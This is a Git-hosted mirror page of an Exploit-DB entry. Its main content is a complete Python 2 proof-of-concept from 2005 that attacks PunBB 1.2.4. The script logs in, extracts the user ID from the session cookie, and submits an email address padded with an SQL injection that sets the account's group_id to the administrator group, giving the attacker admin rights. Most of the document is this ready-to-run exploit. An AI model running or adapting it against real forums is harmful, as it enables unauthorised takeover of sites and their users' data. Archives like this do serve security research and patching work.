bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/928.py
Offensive Security 477bcbdcc0 DB: 2016-03-17 
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

129 lines
4 KiB
Python
Executable file
Raw Blame History

#!/usr/bin/python
#######################################################################
# _ _ _ _ ___ _ _ ___
# | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \
# | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/
# |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_|
#
#######################################################################
# Proof of concept code from the Hardened-PHP Project
#######################################################################
#
# -= PunBB 1.2.4 =-
# change_email SQL injection exploit
#
# user-supplied data within the database is still user-supplied data
#
#######################################################################
import urllib
import getopt
import sys
import string
__argv__ = sys.argv
def banner():
print "PunBB 1.2.4 - change_email SQL injection exploit"
print "Copyright (C) 2005 Hardened-PHP Project\n"
def usage():
banner()
print "Usage:\n"
print " $ ./punbb_change_email.py [options]\n"
print " -h http_url url of the punBB forum to exploit"
print " f.e. http://www.forum.net/punBB/"
print " -u username punBB forum useraccount"
print " -p password punBB forum userpassword"
print " -e email email address where the admin leve activation email is sent"
print " -d domain catch all domain to catch \"some-SQL-Query\"@domain emails"
print ""
sys.exit(-1)
def main():
try:
opts, args = getopt.getopt(sys.argv[1:], "h:u:p:e:d:")
except getopt.GetoptError:
usage()
if len(__argv__) < 10:
usage()
username = None
password = None
email = None
domain = None
host = None
for o, arg in opts:
if o == "-h":
host = arg
if o == "-u":
username = arg
if o == "-p":
password = arg
if o == "-e":
email = arg
if o == "-d":
domain = arg
# Printout banner
banner()
# Check if everything we need is there
if host == None:
print "[-] need a host to connect to"
sys.exit(-1)
if username == None:
print "[-] username needed to continue"
sys.exit(-1)
if password == None:
print "[-] password needed to continue"
sys.exit(-1)
if email == None:
print "[-] email address needed to continue"
sys.exit(-1)
if domain == None:
print "[-] catch all domain needed to continue"
sys.exit(-1)
# Retrive cookie
params = {
'req_username' : username,
'req_password' : password,
'form_sent' : 1
}
wclient = urllib.URLopener()
print "[+] Connecting to retrieve cookie"
req = wclient.open(host + "/login.php?action=in", urllib.urlencode(params))
info = req.info()
if 'set-cookie' not in info:
print "[-] Unable to retrieve cookie... something is wrong"
sys.exit(-3)
cookie = info['set-cookie']
cookie = cookie[:string.find(cookie, ';')]
print "[+] Cookie found - extracting user_id"
user_id = cookie[string.find(cookie, "%3A%22")+6:string.find(cookie, "%22%3B")]
print "[+] User-ID: %d" % (int(user_id))
wclient.addheader('Cookie', cookie);
email = '"' + email[:string.find(email, '@')] + '"@' + email[string.find(email, '@')+1:] + ',"\','
append = 'group_id=\'1'
email = email + ( ((50-len(append))-len(email)) * ' ' ) + append + '"@' + domain
params = {
'req_new_email' : email,
'form_sent' : 1
}
print "[+] Connecting to request change email"
req = wclient.open(host + "profile.php?action=change_email&id=" + user_id, urllib.urlencode(params))
print "[+] Done... Now wait for the email. Log into punBB, go to the link in the email and become admin"
if __name__ == "__main__":
main()
# milw0rm.com [2005-04-11]
Reference in a new issue View git blame Copy permalink